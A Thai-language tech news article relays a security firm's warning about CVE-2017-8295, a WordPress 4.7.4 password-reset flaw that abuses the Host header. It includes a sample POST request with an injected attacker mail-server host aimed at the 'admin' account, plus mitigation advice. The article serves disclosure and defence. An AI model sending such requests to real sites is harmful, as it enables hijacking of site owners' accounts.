เตือนช่องโหว่ Zero-day บน WordPress เวอร์ชันล่าสุด ยังไม่มีแพทช์ !!

I-SECURE ผู้ให้บริการ Managed Security Services ชั้นนำของเมืองไทย ออกมาโพสต์แจ้งเตือนถึงช่องโหว่บน WordPress ระบบ CMS ยอดนิยม เวอร์ชัน 4.7.4 ล่าสุด ซึ่งช่วยให้แฮ็คเกอร์สามารถขโมยลิงค์สำหรับรีเซ็ตรหัสผ่านของเหยื่อได้ ที่สำคัญคือช่องโหว่นี้ยังไม่มีการออกแพทช์เพื่อแก้ไขแต่อย่างใด

I-SECURE ระบุว่า ช่องโหว่นี้ถูกค้นพบโดยนักวิจัยด้านความมั่นคงปลอดภัยที่ชื่อว่า Dawid Golunski ซึ่งมีรหัส CVE-2017-8295 โดยมีสาเหตุมาจากการจัดการ SERVER_NAME ที่ไม่ดีเพียงพอ โดยพบว่า การรีเซ็ตรหัสผ่านของ WordPress จะมีการนำค่าของ SERVER_NAME (ซึ่งสามารถกำหนดได้ผ่าน HOST Header ใน HTTP Request) ไปเป็นค่า From/Return-Path Header ของการตอบอีเมลรีเซ็ตรหัสผ่านกลับไป นั่นคือ ถ้าแฮ็คเกอร์กำหนดชื่อโฮสต์เป็น attackers-mxserver.com จะทำให้ From Header ของอีเมลที่ตอบกลับเปลี่ยนเป็น wordpress@attackers-mxserver.com แทน

ส่งผลให้ถ้าอีเมลรีเซ็ตรหัสผ่านที่ส่งออกไป ส่งไปไม่ถึงเจ้าของ WordPress ไม่ว่าด้วยกรณีใดๆ ก็ตาม เช่น อีเมลเต็ม (อาจถูกแฮ็คเกอร์ส่งไฟล์ขนาดใหญ่มาให้ก่อนการโจมตีเป็นจำนวนมาก) หรือ DNS Server ถูกโจมตี อีเมลที่ตีกลับมานั้น (ซึ่งปกติจะแนบเมลต้นฉบับมาด้วย) จะถูกส่งกลับมาที่อีเมลของแฮ็คเกอร์ (wordpress@attackers-mxserver.com) แทนทันที ผลลัพธ์คือแฮ็คเกอร์สามารถขโมยลิงค์ที่ใช้รีเซ็ตรหัสผ่านบนอีเมลไปใช้เพื่อแก้ไขรหัสผ่านใหม่ให้กลายเป็นของตัวเองได้

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

“ช่องโหว่นี้ส่งผลกระทบบน WordPress เวอร์ชันล่าสุด คือ 4.7.4 และยังไม่มีแพทช์สำหรับอุดช่องโหว่อย่างเป็นทางการ แนะนำให้ผู้ใช้ WordPress ปิดการรีเซ็ตรหัสผ่านของเว็บไซต์ชั่วคราว หรือกำหนดให้ชื่อโดเมนของ Host Header ที่เรียกเข้ามาเป็นแค่ชื่อโดเมนของเว็บไซต์เท่านั้น”I-SECURE แนะนำวิธีป้องกันช่องโหว่ระหว่างรออัปเดตแพทช์

รายละเอียดเกี่ยวกับช่องโหว่สามารถดูได้ที่: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

ขอขอบคุณข้อมูลและคำแนะนำจากบริษัท I-SECURE และ UIH ผู้ให้บริการ Managed Security Services และความมั่นคงปลอดภัยสำหรับ Data Center ชั้นนำของเมืองไทย


About techtalkthai

ทีมงาน TechTalkThai เป็นกลุ่มบุคคลที่ทำงานในสาย Enterprise IT ที่มีความเชี่ยวชาญทางด้าน Network, Security, Server, Storage, Operating System และ Virtualization มารวมตัวกันเพื่ออัพเดตข่าวสารทางด้าน Enterprise IT ให้แก่ชาว IT ในไทยโดยเฉพาะ

Check Also

กลุ่ม RansomHouse ได้กล่าวอ้างถึงการโจรกรรมข้อมูล 450GB จาก AMD

บริษัท AMD ยักษ์ใหญ่ด้านเทคโนโลยีถูกโจมตีทางไซเบอร์ที่ปฏิบัติการโดยกลุ่มอาชญากรทางไซเบอร์ RansomHouse เมื่อเดือนมกราคมที่ผ่านมา ทำให้ข้อมูล 450GB สูญหาย  

CISA ออกคู่มือแนะความมั่นคงปลอดภัยบนคลาวด์

CISA ได้จัดทำคู่มือเพื่อให้ความรู้ความเข้าใจเกี่ยวกับการปฏิบัติตัวของหน่วยงานในสหรัฐฯ แต่จากเนื้อหาแล้วก็สามารถนำมาประยุกต์ใช้อ้างอิงกับองค์กรส่วนใหญ่ได้ครับ